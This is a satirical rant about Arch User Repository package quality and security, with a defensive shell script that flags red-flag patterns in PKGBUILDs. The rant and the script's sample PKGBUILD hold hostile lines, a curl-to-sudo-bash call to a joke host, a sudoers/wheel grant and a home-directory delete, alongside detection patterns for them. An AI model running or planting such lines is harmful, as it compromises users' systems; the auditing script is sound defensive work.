The AUR
Linux gained popularity as a desktop OS. Then people discovered they could upload code.
The Arch User Repository. Supposed to be community packages. What it is: 90,000 packages, 84,900 of which are some teenager’s homework.
Every Unix tool that has worked since 1978 now has seventeen rewrites:
- ls → exa, lsd, nat (all “blazingly fast”)
- cat → bat, ccat, lolcat (because cat needs syntax highlighting)
- grep → ripgrep, ag, ack (grep wasn’t fast enough apparently)
Original ls: 51KB, works everywhere.
exa: 1.4MB, and the AUR build pulls down the whole crate tree to compile it again on every update.
But it has colors!
Let’s talk about what’s inside these PKGBUILDS:
curl -s https://totallynotmalware.ru/install.sh | sudo bash
Twelve thousand people installed it. Because by the time yay offers to show you the PKGBUILD, most people have already typed n. makepkg refuses to run as root, so build() runs as you, but the sudo inside it doesn't prompt if sudo was used in the last few minutes (yay -Syu does exactly that before it builds anything), and the package's install scriptlet runs as root regardless.
The AUR helpers made it worse. Used to be you’d read the PKGBUILD. Now? yay -Syu --noconfirm. Might as well run curl | sudo bash directly. Same thing.
Hyprland brought the ricers. Now the AUR is full of:
- Wallpaper daemons that use more CPU than your actual programs
- Bar programs that need 400MB RAM to display the time
- Rofi forks that are incompatible with everything including themselves
- Window borders that require GPU acceleration
All maintained by someone who’ll abandon it the moment they discover girls.
Half the AUR is orphaned. Maintainer graduated, got a job, realized maintaining discord-anime-mod-git doesn’t pay rent.
Package still there. Still has votes. PKGBUILD from 2019. Probably mining crypto. Nobody knows. Nobody checks. And because it's orphaned, anyone can adopt it, push a new PKGBUILD, and have everyone who still has it installed pull the change on their next -Syu.
yay -S whatever. What could go wrong?
The official repos have everything you need. Really. That terminal emulator written in Rust? You don’t need it. Use xterm. Or urxvt. Or the one you already have.
That system monitor with animations? You don’t need it. Use htop. Or top. Or ps.
That file manager with tabs and plugins and themes? You don’t need it. Use ls and cd. Like an adult.
Know what’s funny? These kids rice their Arch setups, install 400 AUR packages, then complain Windows is bloated.
Your neofetch replacement is 100MB. Windows system32 is calling, it wants its bloat back.
The AUR is NPM for your operating system. Every package depends on twelve others. Those depend on fifty more. Installing a shell script pulls in electron, chromium, nodejs, and somehow PHP.
Could have been one file in /usr/local/bin. Instead it’s a “project.” With CI/CD. With unit tests that don’t run. With documentation that says “WIP.” With issues full of “doesn’t work” and responses of “works on my machine btw i use arch.”
Here’s the thing about security: There is none.
Anyone with an account can upload anything. No review before it goes live. No audit. No checking. The AUR says as much on every package page: user-produced content, not vetted, use at your own risk. The rest is faith that nobody would upload malware to a repository with zero oversight.
That faith is misplaced.
I’ve seen PKGBUILDs that:
- Download binaries over HTTP (makepkg checks the checksum written in the PKGBUILD, so this is exactly as safe as that one line, and sha256sums=('SKIP') turns the check off)
- Add users to sudoers
- Phone home with your data
- Run mysterious scripts from pastebin
- Accidentally (bug?) delete your home directory (“cleaning build artifacts”)
But hey, it has 500 votes. Must be safe.
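Since the whole point is that you read the PKGBUILD before makepkg runs it, here is a scan for the lazy cases listed above and the curl | sudo bash earlier. It is an added example, not code from the AUR, makepkg or any AUR helper; the patterns are this script's own heuristics, and the sample PKGBUILD it writes is constructed for the demo (the URLs in it are placeholders, the package name is made up). It will miss anything obfuscated, so it is a reason to read the file, not a substitute for reading it.

```shell
#!/bin/sh
# Added example, not code from the AUR, makepkg or any AUR helper: a red-flag
# scan to run over a PKGBUILD (and its .install file) before makepkg runs it.
# The patterns are this script's own heuristics; they catch the lazy cases
# the rant describes and miss anything obfuscated.

# flag FILE ERE LABEL: print matching lines under LABEL; succeed iff matched
flag() {
    hits=$(grep -n -E -e "$2" -- "$1") || return 1
    printf '== %s\n%s\n' "$3" "$hits"
}

# audit_pkgbuild FILE: print every finding; return 1 if there was at least one
audit_pkgbuild() {
    f=$1
    bad=0
    flag "$f" '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z)?sh([[:space:]]|$)' \
        'remote script piped straight into a shell' && bad=1
    flag "$f" '(^|[^[:alnum:]_-])sudo[[:space:]]' \
        'sudo inside the build: makepkg never needs root' && bad=1
    flag "$f" '/etc/sudoers|usermod.*(wheel|sudo)' \
        'hands root rights to a user' && bad=1
    flag "$f" 'http://' \
        'unencrypted source URL: only as safe as its checksum line' && bad=1
    flag "$f" 'pastebin\.com|hastebin|ghostbin' \
        'source fetched from a paste site' && bad=1
    flag "$f" "'SKIP'" \
        'checksum check disabled (normal for git sources, not for tarballs or binaries)' && bad=1
    flag "$f" 'rm[[:space:]]+-[[:alpha:]]*r[[:alpha:]]*[[:space:]]+("?[$][{]?HOME|~)' \
        'recursive delete under $HOME' && bad=1
    return $bad
}

# count_findings FILE: number of red-flag classes hit, for scripting
count_findings() {
    audit_pkgbuild "$1" | grep -c '^== ' || true
}

# write_sample FILE: a constructed PKGBUILD with the kind of lines the rant
# describes. Not a real AUR package; the URLs are placeholders.
write_sample() {
    cat >"$1" <<'PKG'
# Maintainer: someone who has since graduated
pkgname=totally-legit-tool
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("http://example.invalid/tool-1.0.tar.gz"
        "https://pastebin.com/raw/notarealpaste")
sha256sums=('SKIP' 'SKIP')

build() {
    curl -s https://totallynotmalware.ru/install.sh | sudo bash
    sudo usermod -aG wheel "$USER"
}

package() {
    rm -rf "$HOME/.cache/tool"   # "cleaning build artifacts"
    install -Dm755 tool "$pkgdir/usr/bin/tool"
}
PKG
}

# Run the demo when invoked directly: sh aur-audit.sh --demo
if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp)
    write_sample "$tmp"
    if audit_pkgbuild "$tmp"; then
        echo "no red flags (still read it)"
    else
        echo "red flags found: read this before you build it"
    fi
    rm -f "$tmp"
fi
```

Usage: git clone https://aur.archlinux.org/pkgname.git (the real AUR fetch URL), run audit_pkgbuild on the PKGBUILD and again on the .install file if there is one, then read the whole thing anyway, then makepkg -si. The demo PKGBUILD trips all seven checks; a clean one trips none, which proves nothing beyond "none of the obvious patterns were there".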
The original Unix philosophy: small tools that do one thing well.
The AUR philosophy: rewrite everything in Rust, make it 100x larger, add features nobody wants, abandon it after two months.
Progress.
You want to know what’s in the AUR that’s actually useful? About twenty packages. Proprietary stuff that can’t be in main repos. Weird drivers for ancient hardware. That’s it.
The rest? Homework. Experiments. Malware. Abandoned projects. Rust rewrites of things that already worked.
But sure, install that Discord mod. Install that terminal that needs a GPU. Install that fetch script that’s somehow 400MB.
Just don’t complain when your system breaks. You were warned. Right here. Right now.